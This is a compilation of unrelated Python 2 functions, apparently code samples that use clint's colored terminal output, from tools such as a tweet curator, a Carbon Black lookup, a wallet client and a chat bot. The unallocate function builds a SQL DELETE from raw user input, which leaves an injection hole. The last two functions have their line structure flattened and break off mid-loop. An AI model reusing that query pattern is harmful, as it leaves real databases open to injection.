def main():
    h = HTMLParser.HTMLParser()
    oldest_id = long(args.id) if args.id else sys.maxint
    try:
        for item in tweepy.Cursor(api.user_timeline).items(2000):
            if item.id >= oldest_id:
                print "seen this tweet already"
                continue
            if not hasattr(item, 'retweeted_status'):
                continue
            username = item.retweeted_status.user.screen_name
            tweet = h.unescape(item.retweeted_status.text)
            if 'http://' in tweet:
                continue
            if username == 'fanfiction_txt':
                continue
            print colored.red('@{}'.format(username))
            print colored.blue(tweet)
            print "Add this tweet?"
            answer = raw_input()
            if answer == 'y' or answer == '':
                add_tweet(username, tweet)
    except:
        if 'item' in locals():
            print "Current tweet ID is {}".format(item.id)
        raise
def check_execution(self, md5):
    parentquery = 'parent_md5:' + md5
    md5query = 'md5:' + md5
    if md5query.endswith(" "):
        print colored.red("[-] Bit9 did not capture the MD5 :(\n")
    else:
        print colored.yellow("[*] Checking if Parent MD5 process in Carbon Black...")
        parentresult = self.cb.process_search(parentquery, sort='start desc')
        if parentresult['total_results'] == 0:
            print colored.cyan("[+] Not a Parent MD5 process")
        else:
            cbparentmd5url = self.parentmd5url + md5 + "&sort=&rows=10&start=0"
            print colored.green("[+] Parent MD5 event found in Carbon Black.")
            print colored.cyan(cbparentmd5url)
        print colored.yellow("[*] Checking if MD5 seen in Carbon Black...")
        md5result = self.cb.process_search(md5query, sort='start desc')
        if md5result['total_results'] == 0:
            print colored.cyan("[+] Not seen in Carbon Black.")
        else:
            cbmd5url = self.md5url + md5 + "&sort=&rows=10&start=0"
            print colored.green("[+] MD5 Found in CB.")
            print colored.cyan(cbmd5url)

#cb=CB()
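# Minimal usage sketch for the method above. The enclosing class name `CB`
# and its no-argument constructor are assumptions taken from the commented-out
# `cb=CB()` hint; the MD5 value is a placeholder, not real data.
#
#     cb = CB()
#     cb.check_execution("d41d8cd98f00b204e9800998ecf8427e")  # query Carbon Black for this MD5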
def encode(self, session, track):
    # write ID3 data
    print "\n" + colored.green(str("Encode:"))
    success = True
    for enc in self.get_encoders():
        if not enc.run(session, self._meta):
            print colored.red("Error encoding: %s" % enc.suffix)
            success = False
    #try:
    #    puts('Moving %s to %s' % ('temp.mp3', mp3_path))
    #except UnicodeEncodeError:
    #    sys.stdout.write(' # Moving %s to %s\n' % ('temp.mp3', mp3_path))
    ## move mp3 to final directory
    if not success:
        print colored.red("Error processing file. Keep raw file")
        return
    os.unlink(self._meta["out_path"] + ".raw")
    if os.path.exists("cover.jpg"):
        os.unlink("cover.jpg")  # delete cover
    #if not self._json_queue.is_starred_track():
    #    self._util.shell("rm -f cover.jpg")
    self._json_queue.mark_as_downloaded(Link.from_track(track))
def display_available_branches():
    """Displays available branches."""
    branches = get_branches()
    if not branches:
        print colored.red('No branches available')
        return
    branch_col = len(max([b.name for b in branches], key=len)) + 1
    for branch in branches:
        try:
            branch_is_selected = (branch.name == repo.head.ref.name)
        except TypeError:
            branch_is_selected = False
        marker = '*' if branch_is_selected else ' '
        color = colored.green if branch_is_selected else colored.yellow
        pub = '(published)' if branch.is_published else '(unpublished)'
        print columns(
            [colored.red(marker), 2],
            [color(branch.name), branch_col],
            [black(pub), 14]
        )
def create_repository(project_name, description, organization=None):
    if not have_credentials():
        puts('{0}. {1}'.format(colored.blue('octogit'),
             colored.red('in order to create a repository, you need to login.')))
        sys.exit(1)
    if local_already(project_name):
        sys.exit(1)
    post_dict = {'name': project_name, 'description': description, 'homepage': '',
                 'private': False, 'has_issues': True, 'has_wiki': True,
                 'has_downloads': True}
    if organization:
        post_url = 'https://api.github.com/orgs/{0}/repos'.format(organization)
    else:
        post_url = 'https://api.github.com/user/repos'
    r = requests.post(post_url, headers=get_headers(), data=json.dumps(post_dict))
    if r.status_code == 201:
        if organization:
            create_local_repo(organization, project_name)
        else:
            create_local_repo(get_username(), project_name)
    else:
        # Something went wrong
        post_response = json.loads(r.content)
        errors = post_response.get('errors')
        if errors and errors[0]['message'] == 'name already exists on this account':
            puts('{0}. {1}'.format(colored.blue('octogit'),
                 colored.red('repository named this already exists on github')))
        else:
            puts('{0}. {1}'.format(colored.blue('octogit'),
                 colored.red('something went wrong. perhaps you need to login?')))
        sys.exit(-1)
def get_block_js(func, **modifiers):
    """Returns the js for a block with the given modifiers.
    """
    from importlib import import_module
    import os.path
    mo = import_module(func.__module__)
    dir_name = os.path.dirname(mo.__file__)
    main_js_filename = os.path.join(
        dir_name, 'js', get_block_name(func) + '.js')
    js_filename_with_modifiers = os.path.join(
        dir_name, 'js', get_blockname_with_modifiers(func, **modifiers) + '.js')
    result = u''
    print 'checking', main_js_filename,
    if os.path.exists(main_js_filename):
        print colored.green('found')
        with open(main_js_filename) as f:
            result += f.read().decode('utf-8') + u'\n'
    else:
        print colored.red('missing')
    if js_filename_with_modifiers != main_js_filename:
        print 'checking', js_filename_with_modifiers,
        if os.path.exists(js_filename_with_modifiers):
            print colored.green('found')
            with open(js_filename_with_modifiers) as f:
                result += f.read().decode('utf-8') + u'\n'
        else:
            print colored.red('missing')
    return result
def rip(self, session,    # the current session
        frames,           # the audio data
        frame_size,       # bytes per frame
        num_frames,       # number of frames in this delivery
        sample_type,      # currently this is always 0, which means 16-bit
                          # signed native endian integer samples
        sample_rate,      # audio sample rate, in samples per second
        channels):        # number of audio channels, currently 1 or 2
    self._downloaded += float(frame_size) * float(num_frames)
    if self._ripping:
        # 320 kilobits per second
        # 40 kilobytes per second
        # duration in milliseconds
        # 40 bytes per millisecond
        if not self._pipe:
            self.end_of_track(session)
            return
        total_bytes = float(self._duration) * 40.0
        # 100 = 4.41 (don't ask me why)
        progress_perc = self._downloaded / total_bytes
        progress_perc = progress_perc * (100.0 / 4.41)
        progress.bar(range(100))
        sys.stdout.write('\r > Progress: %.2f%%' % progress_perc)
        try:
            self._pipe.write(frames)
        except IOError as e:
            print colored.red("ERROR: %s" % e)
            os.kill(os.getpid(), 9)
def printFinalResult(self, output, passed, numberOfTests):
    # Given test cases don't exist
    if numberOfTests == 0 and len(self.testCases) > 0:
        puts(colored.red("Given test cases " + str(self.testCases) +
                         " don't exist for problem with id " + str(self.problemId) + "!"))
        sys.exit(1)
    # No tests found
    elif numberOfTests == 0:
        puts(colored.red("No test cases found for problem with id " + str(self.problemId) + "!"))
        sys.exit(1)
    # Log was created and LOG=True (-more is used)
    if self.logFileBool and self.showInfo:
        puts(colored.yellow("Check log file \"cae_log\" in your working directory for more detailed info!"))
    # All tests passed
    if passed >= numberOfTests:
        puts(colored.green("\nAll (" + str(numberOfTests) + ") test/s passed! Well done!"))
    # All tests failed
    elif passed <= 0:
        puts(colored.red("\nAll (" + str(numberOfTests) + ") test/s failed! Try again!"))
    # Some tests failed
    else:
        puts("\nNumber of tests passed: " + str(passed) + "/" + str(len(output['testCases'])))
        puts(colored.yellow("Some tests failed! Almost there, keep trying!"))
def checkToken(self, tokenInput):
    response = requests.post(self.pathAssociateToken + tokenInput)
    # Check if status not 200
    if response.status_code != requests.codes.ok:
        puts(colored.red("Bad request!"))
        sys.exit(1)
    data = response.json()
    # Check if wrong token
    if 'errorMessage' in data.keys():
        puts(colored.red("Invalid token!"))
        sys.exit(1)
    # Modify encoding of account info
    self.modifyEncoding(data)
    # Token is ok
    if data['success'] and self.showInfo:
        puts(colored.green("Token is valid!\n"))
        formatNum = len(data['email'].decode('utf8')) + 8
        puts(" " * (formatNum / 3) + colored.yellow("Account info"))
        nameLen = len(data['name'].decode('utf8')) + 8
        puts("|" + "=" * formatNum + "|")
        # puts(colored.yellow("\tAccount info"))
        puts("| " + colored.yellow("Name: ") + " " + data['name'] +
             " " * (formatNum - nameLen) + "|\n| " +
             colored.yellow("Email: ") + data['email'] + "|")
        puts("|" + "=" * formatNum + "|")
        puts()
    return True
def Run(report):
    print colored.yellow("[*] Creating time table.")
    timelist = []
    timetable = {}
    for item in report['process'].get('filemod_complete', []):
        timelist.append(item.split("|")[1][:-4])
    try:
        for item in report['process'].get('regmod_complete', []):
            timelist.append(item.split("|")[1][:-4])
    except:
        print colored.red("[-] No registry modifications made.")
        pass
    try:
        for item in report['process'].get('netconn_complete', []):
            timelist.append(item.split("|")[0][:-4])
    except:
        print colored.red("[-] No network connections found in process report.")
        pass
    for item in report['process'].get('modload_complete', []):
        timelist.append(item.split("|")[0][:-4])
    timelist = sorted(set(timelist))
    for time in timelist:
        #print datetime.strptime(time, '%Y-%m-%d %H:%M:%S')
        timetable[time] = []
    print colored.green("[+] Completed.\n")
    return timetable, timelist
def __format_file(file_gist):
    """
    Formats the output for a GistFile object.

    :param gist: :class: `GistFile <GistFile>` instance.
    """
    # Calculate the number of columns of the current terminal window
    rows, columns = os.popen('stty size', 'r').read().split()

    # Prepare the Header
    gist_string = colored.cyan('-' * int(columns)) + "\n"
    gist_string += colored.cyan("File [" + file_gist.filename + "]\n")
    gist_string += colored.cyan('-' * int(columns)) + "\n"

    # Format Gist data
    gist_string += (colored.green("Language:") + " " +
                    colored.red(file_gist.language) + "\n")
    gist_string += (colored.green("Size:") + " " +
                    colored.red(file_gist.size) + "\n")
    gist_string += (colored.green("Raw Url:") + " " +
                    colored.red(file_gist.raw_url + "\n"))
    gist_string += (colored.green("Content:\n\n") + file_gist.content + "\n\n")

    # Prepare the Footer
    gist_string += colored.cyan('-' * int(columns)) + "\n"

    return gist_string
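# Note on the terminal-size lookup above: `os.popen('stty size', 'r')` returns an
# empty string when stdout is not a TTY (e.g. piped output), so the tuple unpack
# raises ValueError. A minimal fallback sketch, not part of the original project
# (the helper name and the 80-column default are my own; on Python 3,
# shutil.get_terminal_size() would do this natively):
import os

def _terminal_columns(default=80):
    # Best effort: try stty, fall back to $COLUMNS, then a fixed default.
    try:
        _, columns = os.popen('stty size', 'r').read().split()
        return int(columns)
    except ValueError:
        return int(os.environ.get('COLUMNS', default))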
def notification(flag):
    """Notifications tell us what is going on behind the scenes."""
    if flag == 1:
        puts(colored.red("error : wrong value entered! input correct value."))
        space()
        flag = 0
    elif flag == 2:
        puts(colored.yellow("success : username successfully added to data file."))
        space()
        flag = 0
    elif flag == 3:
        puts(colored.red("error : invalid username entered."))
        space()
        flag = 0
    elif flag == 4:
        puts(colored.red("error : username already present."))
        space()
        flag = 0
    elif flag == 5:
        puts(colored.red("error : username not present in list."))
        space()
        flag = 0
    elif flag == 6:
        puts(colored.yellow("success : username deleted successfully."))
        space()
        flag = 0
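# A table-driven alternative to the flag branching above; the lookup table and the
# function name are my own sketch, the message codes and the puts/space/colored
# helpers are taken from the original. Note that resetting `flag = 0` in the
# original only rebinds a local name, so dropping it does not change behaviour.
MESSAGES = {
    1: (colored.red, "error : wrong value entered! input correct value."),
    2: (colored.yellow, "success : username successfully added to data file."),
    3: (colored.red, "error : invalid username entered."),
    4: (colored.red, "error : username already present."),
    5: (colored.red, "error : username not present in list."),
    6: (colored.yellow, "success : username deleted successfully."),
}

def notification_table_driven(flag):
    color, message = MESSAGES.get(flag, (colored.red, "error : unknown notification code."))
    puts(color(message))
    space()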
def download_jfsfile(remote_object, tofolder=None, checksum=False):
    'Helper function to get a jfsfile and store it in a local folder, optionally checksumming it. Returns boolean'
    if tofolder is None:
        tofolder = '.'  # with no arguments, store in current dir
    total_size = remote_object.size
    if remote_object.state in (JFS.ProtoFile.STATE_CORRUPT, JFS.ProtoFile.STATE_INCOMPLETE):
        puts(colored.red('%s was NOT downloaded successfully - Incomplete file' % remote_object.name))
        return False
    topath = os.path.join(tofolder, remote_object.name)
    with open(topath, 'wb') as fh:
        bytes_read = 0
        puts(colored.white('Downloading: %s, size: %s \t' %
                           (remote_object.name, print_size(total_size, humanize=True))))
        with ProgressBar(expected_size=total_size) as bar:
            for chunk_num, chunk in enumerate(remote_object.stream()):
                fh.write(chunk)
                bytes_read += len(chunk)
                bar.show(bytes_read)
    if checksum:
        md5_lf = JFS.calculate_md5(open(topath, 'rb'))
        md5_jf = remote_object.md5
        logging.info('%s - Checksum for downloaded file' % md5_lf)
        logging.info('%s - Checksum for server file' % md5_jf)
        if md5_lf != md5_jf:
            puts(colored.blue('%s - Checksum for downloaded file' % md5_lf))
            puts(colored.blue('%s - Checksum for server file' % md5_jf))
            puts(colored.red('%s was NOT downloaded successfully - checksum mismatch' % remote_object.name))
            return False
        puts(colored.green('%s was downloaded successfully - checksum matched' % remote_object.name))
    return True
def Build():
    try:
        year = int(sys.argv[4])
        month = int(sys.argv[5])
        day = int(sys.argv[6])
        timestamp = datetime(year, month, day)
    except IndexError:
        print colored.red("Date missing: python main.py build yyyy mm dd")
        print colored.yellow("Assuming current date:")
        timestamp = datetime.today()

    print "BUILDING Database and content"

    # Generate Users
    #user_generator = UserGenerator()
    #user_generator.run()

    # Generate Places
    #place_generator = PlaceGenerator()
    #place_generator.run()

    # Generate Friendships
    #fs_generator = FriendshipGenerator()
    #fs_generator.run()

    # Generate Topics
    #tp_generator = TopicGenerator(amount=1000)
    #tp_generator.run()

    # Generate Circuits
    #circuit_generator = CircuitGenerator()
    #circuit_generator.run()

    # Generate places per circuit
    #pl_ct_generator = Place_circuit_generator()
    #pl_ct_generator.run()

    # Generate topics per circuit
    #tc_ct_generator = Topic_circuit_generator()
    #tc_ct_generator.run()

    # Generate explicit_interests
    #exp_generator = ExplicitGenerator(date=timestamp)
    #exp_generator.run()

    # Generate Visits
    #visit_generator = VisitGenerator(date=timestamp)
    #visit_generator.run(min_equiv=360)  # 360 mins = 6 hours

    # Generate topic follows
    #follow_generator = FollowGenerator(date=timestamp)
    #follow_generator.run()

    # Generate Ratings
    #rating_generator = RatingsGenerator()
    #rating_generator.run()

    # Generate category follow
    #category_follow = CategoryFollowGenerator()
    #category_follow.run()

    # Generate Place.done
    pc_done = PlaceDoneGenerator()
    pc_done.run()
def addflow(self):
    print("\tThis is Dynamic Addflow, so you can avoid writing long lines on the\n" +
          "\tcommand line. Add a new todo:\n\n")
    try:
        task = input("What's the thing? (req): ").strip()
        if task in ['', ' ']:
            raise ValueError
    except ValueError as e:
        raise ValueError(colored.red("Task cannot be left empty"))
    try:
        bounty = int(input("How much is the reward (integer): (" + str(1) + ") ") or 1)
    except ValueError as e:
        raise ValueError(colored.red("Bounty should be an integer"))
    try:
        due = input("When is it due? (YYYY-MM-DD HH:mm) / +(due_rules): ").strip()
        due_datetime = None
        if due:
            due_datetime = parse_duestring(due)
    except ValueError as e:
        raise ValueError(colored.red("Bad date format: expected formats (YYYY-MM-DD or due_rules)"))
    tags = input("Tags (comma separated): ").strip().split(',')
    tags = clean_tags(tags)
    foldername = input("Folder/Project: ").strip()
    foldername = clean_foldername(foldername)
    self._todos.add(task, bounty, due_datetime, tags, foldername)
def oort(oortpath, jnius):
    GZIPOutputStream = jnius.autoclass("java.util.zip.GZIPOutputStream")
    ObjectOutputStream = jnius.autoclass("java.io.ObjectOutputStream")
    File = jnius.autoclass("java.io.File")
    FileOutputStream = jnius.autoclass("java.io.FileOutputStream")

    from pylire.process.bitsampling import BITS
    from pylire.process.bitsampling import NUM_BITS, NUM_DIMENSIONS, NUM_FUNCTION_BUNDLES

    puts(colored.cyan("Writing HDF5 data to ObjectOutputStream..."))

    if isfile(oortpath):
        unlink(oortpath)

    oortcloud = ObjectOutputStream(GZIPOutputStream(FileOutputStream(File(oortpath))))
    oortcloud.writeInt(NUM_BITS)
    oortcloud.writeInt(NUM_DIMENSIONS)
    oortcloud.writeInt(NUM_FUNCTION_BUNDLES)

    with indent(3, quote="+ "):
        puts(colored.red("(int) NUM_BITS: %d" % NUM_BITS))
        puts(colored.red("(int) NUM_DIMENSIONS: %d" % NUM_DIMENSIONS))
        puts(colored.red("(int) NUM_FUNCTION_BUNDLES: %d" % NUM_FUNCTION_BUNDLES))

    for floatval in progress.bar(BITS.flatten(), label=colored.red(" (float) BITS")):
        oortcloud.writeFloat(floatval)

    oortcloud.flush()
    oortcloud.close()
def run():
    try:
        option = sys.argv[3].upper()
    except IndexError:
        print colored.red("Argument missing: python main.py delete|build yyyy mm dd|simulate ndays|rebuild yyyy mm dd")
        exit(0)
    if option == 'DELETE':
        #Delete()
        exit(0)
    if option == 'BUILD':
        Build()
        exit(0)
    if option == 'SIMULATE':
        #Simulate()
        exit(0)
    if option == 'REBUILD':
        """ DELETE + BUILD """
        #Delete()
        #Build()
        exit(0)
    else:
        print "Not an option: python main.py build|delete|simulate"
        exit(0)
def generate_offline_tx(wallet_obj):
    if not USER_ONLINE:
        puts(colored.red('BlockCypher connection needed to fetch unspents for signing.'))
        return

    # TODO: implement
    puts(colored.red('Feature Coming Soon'))
def broadcast_signed_tx(wallet_obj):
    if not USER_ONLINE:
        puts(colored.red('BlockCypher connection needed to broadcast signed transaction.'))
        return

    # TODO: implement
    puts(colored.red('Feature Coming Soon'))
def processManifest(args):
    manifestPath = os.path.join(args.baseDir, "sprites.mf")
    if not os.path.exists(manifestPath):
        raise Usage("Manifest not found at %s." % (red(manifestPath, bold=True)),
                    (manifestPath,))
    lineCount = len(open(manifestPath).readlines())
    manifest = csv.DictReader(open(manifestPath), skipinitialspace=True)
    manifest.fieldnames = ["filename", "spritesheet"]
    spritesheets = {}
    for line in progress.bar(manifest, label="Reading Manifest: ", expected_size=lineCount):
        sheet = line["spritesheet"]
        image = line["filename"]
        imagePath = os.path.join(args.baseDir, image)
        if not os.path.exists(imagePath):
            raise Usage(
                "Image not found at %s from %s, %s." % (
                    red(imagePath, bold=True),
                    blue(manifestPath, bold=True),
                    blue("line " + str(manifest.line_num), bold=True),
                ),
                (imagePath, manifestPath, manifest.line_num),
            )
        spritesheets.setdefault(sheet, Spritesheet(sheet)).addImage(image)
    return spritesheets.values()
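# For reference, the DictReader configuration above (fieldnames assigned manually,
# skipinitialspace=True) implies a headerless two-column CSV. A hedged sketch of
# what a sprites.mf manifest might look like -- the file names here are made up,
# not taken from the project:
#
#     player_idle.png,  characters
#     player_walk.png,  characters
#     grass_tile.png,   terrain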
def display_recent_txs(wallet_obj):
    if not USER_ONLINE:
        puts(colored.red('BlockCypher connection needed to find transactions related to your addresses.'))
        puts(colored.red('You may dump all your addresses while offline by selecting option 0.'))
        return

    local_tz = get_localzone()

    # Show overall balance info
    display_balance_info(wallet_obj=wallet_obj)

    mpub = wallet_obj.serialize_b58(private=False)
    wallet_name = get_blockcypher_walletname_from_mpub(
        mpub=mpub,
        subchain_indices=[0, 1],
    )
    wallet_details = get_wallet_transactions(
        wallet_name=wallet_name,
        api_key=BLOCKCYPHER_API_KEY,
        coin_symbol=coin_symbol_from_mkey(mpub),
    )
    verbose_print(wallet_details)

    # TODO: pagination for lots of transactions
    txs = wallet_details.get('unconfirmed_txrefs', []) + wallet_details.get('txrefs', [])

    if txs:
        for tx_object in flatten_txns_by_hash(txs, nesting=False):
            if tx_object.get('confirmed_at'):
                tx_time = tx_object['confirmed_at']
            else:
                tx_time = tx_object['received_at']
            net_satoshis_tx = sum(tx_object['txns_satoshis_list'])
            conf_str = ''
            if tx_object.get('confirmed_at'):
                if tx_object.get('confirmations'):
                    if tx_object.get('confirmations') <= 6:
                        conf_str = ' (%s confirmations)' % tx_object.get('confirmations')
                    else:
                        conf_str = ' (6+ confirmations)'
            else:
                conf_str = ' (0 confirmations!)'
            puts(colored.green('%s: %s%s %s in TX hash %s%s' % (
                tx_time.astimezone(local_tz).strftime("%Y-%m-%d %H:%M %Z"),
                '+' if net_satoshis_tx > 0 else '',
                format_crypto_units(
                    input_quantity=net_satoshis_tx,
                    input_type='satoshi',
                    output_type=UNIT_CHOICE,
                    coin_symbol=coin_symbol_from_mkey(mpub),
                    print_cs=True,
                ),
                'received' if net_satoshis_tx > 0 else 'sent',
                tx_object['tx_hash'],
                conf_str,
            )))
    else:
        puts('No Transactions')
def main(self, target):
    minions = self.parent.client.cmd(target, 'test.ping')
    if len(minions) == 0:
        puts(colored.red("No up minions matching, abort!"))
        sys.exit(1)
    for minion in minions:
        puts(colored.blue("=" * 10))
        puts(colored.blue("Minion: %s" % minion))
        puts(colored.blue("Starting healthchecks on %s" % minion))
        health_checks_result = self.parent.client.cmd(
            minion, 'state.top', 9999999999, 'healthcheck_top.sls')[minion]
        x = _format_host(minion, health_checks_result)
        print x[0]
        success = parse_result(health_checks_result)
        if not success:
            puts()
            puts(colored.red("Healthchecks has failed on minion %s" % minion))
        else:
            puts()
            puts(colored.green("Healthchecks success on minion %s" % minion))
def subdown(args):
    def coerce_or_die(args, arg, f=int):
        try:
            try:
                val = f(args[arg])
                if val < 0:
                    raise Exception('{} must be positive.'.format(arg))
                return val
            except ValueError:
                raise Exception('{} must be coercable to {}.'.format(arg, f))
        except Exception as e:
            puts(colored.red(str(e)))
            sys.exit(1)

    timeout = coerce_or_die(args, '--timeout', f=float)
    page_timeout = coerce_or_die(args, '--page-timeout', f=float)
    max_count = coerce_or_die(args, '--pages')

    subreddits = args['<subreddit>']
    for subreddit in subreddits:
        try:
            subreddit = fix_subreddit_name(subreddit)
        except:
            puts(colored.red('Failed to load subreddit {}'.format(subreddit)))
            continue
        try:
            get_subreddit(subreddit, max_count, timeout, page_timeout)
        except Exception as e:
            raise
            puts(colored.red(str(e)))
def list_existing_accounts():
    col = 20
    all_accounts = account_store.get_all_accounts()
    if len(all_accounts) == 0:
        puts(colored.red("There is no linked account yet."))
        return
    puts(colored.green("You have linked the following account(s) to onedrive-d:\n"))
    puts(
        columns(
            [(colored.red("Index")), 10],
            [(colored.magenta("Account ID")), col],
            [(colored.cyan("Account Type")), col],
            [(colored.green("Name")), None],
        )
    )
    account_list = []
    for id, account in all_accounts.items():
        puts(
            columns(
                [str(len(account_list)), 10],
                [account.profile.user_id, col],
                [account.TYPE, col],
                [account.profile.name, None],
            )
        )
        account_list.append(account)
    puts(colored.yellow("\nTo delete an account, type the index and hit [Enter]. Otherwise hit [Ctrl+C] to break."))
    puts(colored.yellow("Note: all the Drives belonging to the account will also be deleted."))
    puts()
    try:
        prompt_delete_account(account_list)
    except KeyboardInterrupt:
        puts(colored.green("Aborted."))
def main():
    # take care of the new user trying to figure wtf is going on here
    if not args or args.get(0) == 'help' and len(args) == 1:
        usage()
        exit(0)

    try:
        center = CommandCenter(DEFAULT_BLT_FILE)
    except IOError as e:
        print red('[ERROR]') + ' %s' % e
        exit(1)

    # figure out our environment
    envtype = determine_envtype()

    # user is requesting help on a specific command
    if args.get(0) == 'help':
        # call the commandcenter help method, we skip past index 0 which
        # is just the "help" arg.
        center.help(args[1:])
        exit(0)

    # check if the user is requesting a list:
    if args.get(0) == 'list':
        center.list(args[1:])
    elif args.get(0) == 'completion':
        print '\n'.join(sorted(center.commands.keys()))
    else:
        cmd = args.pop(0)
        try:
            center.run(envtype, cmd, args.all)
        except KeyboardInterrupt:
            print '\nCancelled.'
def unallocate(docopt_args):
    """Unallocates a staff member from his/her given room"""
    personnel_name = ""
    name_of_room = ""
    if docopt_args["-p"] and docopt_args["-r"]:
        personnel_name = docopt_args["<fname>"] + " " + docopt_args["<lname>"]
        name_of_room = docopt_args["<name_of_room>"]
        db = DatabaseManager("Amity.sqlite")
        # query db to find the specific allocation
        cursor = db.query("DELETE from Allocations where Personnel_Name = '" +
                          personnel_name + "' and Room_name = '" + name_of_room + "'")
        if cursor.rowcount > 0:
            puts(colored.green(
                personnel_name + " has been unallocated room " + name_of_room + " successfully!"))
            # update the cache
            f = open("cache", 'r')
            filedata = f.read()
            f.close()
            newdata = filedata.replace(
                "('" + name_of_room + "', '" + personnel_name + "')", "")
            f = open("cache", 'w+')
            f.write(newdata)
            f.close()
        else:
            puts(colored.red("The allocation does not exist"))
    else:
        puts(colored.red("You failed to supply a personnel name and room name"))
def add_personal_account():
    puts(colored.green("Link with an OneDrive Personal account:"))
    puts(
        colored.cyan(
            "Please use your browser to visit the following URL, sign in with your OneDrive account and "
            "authorize onedrive-d, then copy the callback URL back here. The callback URL is the URL at "
            "which the authorization page goes blank and usually starts with " +
            clients.PersonalClient.DEFAULT_REDIRECT_URI + "."
        )
    )
    puts()
    puts(colored.yellow("Please visit this URL: "))
    puts(personal_client.get_auth_uri())
    while True:
        try:
            url = prompt.query(str(colored.yellow("\nPlease paste the callback URL or hit [Ctrl+C] to abort:")))
            account = accounts.get_personal_account(personal_client, uri=url)
            profile = account.profile
            account_store.add_account(account)
            puts(colored.green("Success: added account {} ({}).".format(profile.user_id, profile.name)))
            return
        except KeyboardInterrupt:
            puts(colored.red("Aborted."))
            return
        except Exception as ex:
            puts(colored.red("Error: " + str(ex)))
def test_regex(self, line):
    '''Test a regex to see how many actions match.
    '''
    try:
        rgx = re.compile(line)
    except sre_constants.error as e:
        msg = red('Bad regex: ') + green(repr(line)) + ' You have failed the bat-test.'
        puts(msg)
        print e
        return
    self.current_rgx = rgx
    puts('Testing ' + colored.green(line))
    matched = []
    for action in self.actions.unmatched:
        m = re.search(line, action)
        if m:
            matched.append([action, m.groupdict()])
    if not matched:
        with indent(4, quote=' >'):
            puts(red('Aw, snap!') + ' ' + cyan('No matches found!'))
        return
    self.current_rgx = line
    self.show_matches_start = 0
    with indent(4, quote=' >'):
        puts('Found ' + colored.red(len(matched)) + ' matches:')
        self._print_matches(matched[:self.show])
    self.matched = matched
def main(args=None):
    parser = setup_parser()
    opts = parser.parse_args(args=args)

    rc = 0
    try:
        opts.func(opts)
    except InsufficientPermissionsError as e:
        puts_err(colored.red("\nInsufficient permissions error:\n") + str(e) + "\n")
        rc = 1
    except BlockadeError as e:
        puts_err(colored.red("\nError:\n") + str(e) + "\n")
        rc = 1
    except KeyboardInterrupt:
        puts_err(colored.red("Caught Ctrl-C. exiting!"))
    except:
        puts_err(
            colored.red("\nUnexpected error! This may be a Blockade bug.\n"))
        traceback.print_exc()
        rc = 2
    sys.exit(rc)
def capitalone(user=None, quit_when_finished=True, browser=None):
    if not user:
        # Get the username from the command line arguments.
        user = args.get(0)

    # Must supply username.
    if user is None:
        puts(colored.red('You must supply a username like "python capitalone.py nick"'))
        sys.exit()

    # Get the user's password from the password backend.
    key = keyring.get_password('capitalone.com', user)

    # If the key doesn't exist in the password backend.
    if key is None:
        puts(colored.red("You must store the password for {} in your keyring's backend.".format(user)))
        puts('See: http://pypi.python.org/pypi/keyring/#configure-your-keyring-lib')
        sys.exit()

    # Log what we're currently working on.
    puts(colored.blue('\nCapital One ({})'.format(user)))

    if not browser:
        # Init the WebDriver.
        b = webdriver.Firefox()
    else:
        b = browser

    b.get('https://www.capitalone.com/')

    # Only credit card accounts are supported at this time.
    account_type = b.find_element_by_css_selector('option[value="credit cards"]')
    account_type.click()

    # Find the username field on the page.
    username = b.find_element_by_css_selector('input#eos-userid')
    username.send_keys(user)

    # Find the password field on the page.
    password = b.find_element_by_css_selector('input#eos-password')
    password.send_keys(key)
    password.submit()

    # Wait for an account list.
    try:
        WebDriverWait(b, timeout=10).until(_element_available(b, 'table.dataTable'))
    except TimeoutException:
        puts(colored.red("Couldn't find any accounts for that username."))
        b.quit()
        sys.exit()

    amount = b.find_element_by_css_selector('table.dataTable tr.itemSummary td:nth-child(4) p')
    print 'Capital One ({}): {}'.format(user, amount.text)

    if quit_when_finished:
        b.quit()

    return b
def post_fb(api, content, attachment):
    try:
        api.put_wall_post(message=content, attachment=attachment)
    except Exception as err:
        print(colored.red(err))
def verify_io(self): puts("Verifying IO backends...") missing_settings = False missing_setting_error_messages = [] one_valid_backend = False self.valid_io_backends = [] if not hasattr(settings, "IO_BACKENDS"): settings.IO_BACKENDS = ["will.backends.io_adapters.shell", ] # Try to import them all, catch errors and output trouble if we hit it. for b in settings.IO_BACKENDS: with indent(2): try: path_name = None for mod in b.split('.'): if path_name is not None: path_name = [path_name] file_name, path_name, description = imp.find_module(mod, path_name) # show_valid("%s" % b) module = import_module(b) for class_name, cls in inspect.getmembers(module, predicate=inspect.isclass): if ( hasattr(cls, "is_will_iobackend") and cls.is_will_iobackend and class_name != "IOBackend" and class_name != "StdInOutIOBackend" ): c = cls() show_valid(c.friendly_name) c.verify_settings() one_valid_backend = True self.valid_io_backends.append(b) except EnvironmentError as e: puts(colored.red(" ✗ %s is missing settings, and will be disabled." % b)) puts() missing_settings = True except Exception as e: error_message = ( "IO backend %s is missing. Please either remove it \nfrom config.py " "or WILL_IO_BACKENDS, or provide it somehow (pip install, etc)." ) % b puts(colored.red("✗ %s" % b)) puts() puts(error_message) puts() puts(traceback.format_exc()) missing_setting_error_messages.append(error_message) missing_settings = True if missing_settings and not one_valid_backend: puts("") error( "Unable to find a valid IO backend - will has no way to talk " "or listen!\n Quitting now, please look at the above errors!\n" ) self.handle_sys_exit() return False puts() return True
def bootstrap(self): print_head() self.load_config() self.bootstrap_storage_mixin() self.bootstrap_pubsub_mixin() self.bootstrap_plugins() self.verify_plugin_settings() started = self.verify_io() if started: puts("Bootstrapping complete.") # Save help modules. self.save("help_modules", self.help_modules) puts("\nStarting core processes:") # try: # Exit handlers. # signal.signal(signal.SIGINT, self.handle_sys_exit) # # TODO this hangs for some reason. # signal.signal(signal.SIGTERM, self.handle_sys_exit) # Scheduler self.scheduler_thread = Process(target=self.bootstrap_scheduler) # Bottle self.bottle_thread = Process(target=self.bootstrap_bottle) # Event handler self.incoming_event_thread = Process(target=self.bootstrap_event_handler) self.io_threads = [] self.analysis_threads = [] self.generation_threads = [] with indent(2): try: # Start up threads. self.bootstrap_io() self.bootstrap_analysis() self.bootstrap_generation() self.bootstrap_execution() self.scheduler_thread.start() self.bottle_thread.start() self.incoming_event_thread.start() errors = self.get_startup_errors() if len(errors) > 0: error_message = "FYI, I ran into some problems while starting up:" for err in errors: error_message += "\n%s\n" % err puts(colored.red(error_message)) self.stdin_listener_thread = False if self.has_stdin_io_backend: self.current_line = "" while True: for line in sys.stdin.readline(): if "\n" in line: self.publish( "message.incoming.stdin", Event( type="message.incoming.stdin", content=self.current_line, ) ) self.current_line = "" else: self.current_line += line self.sleep_for_event_loop(2) else: while True: 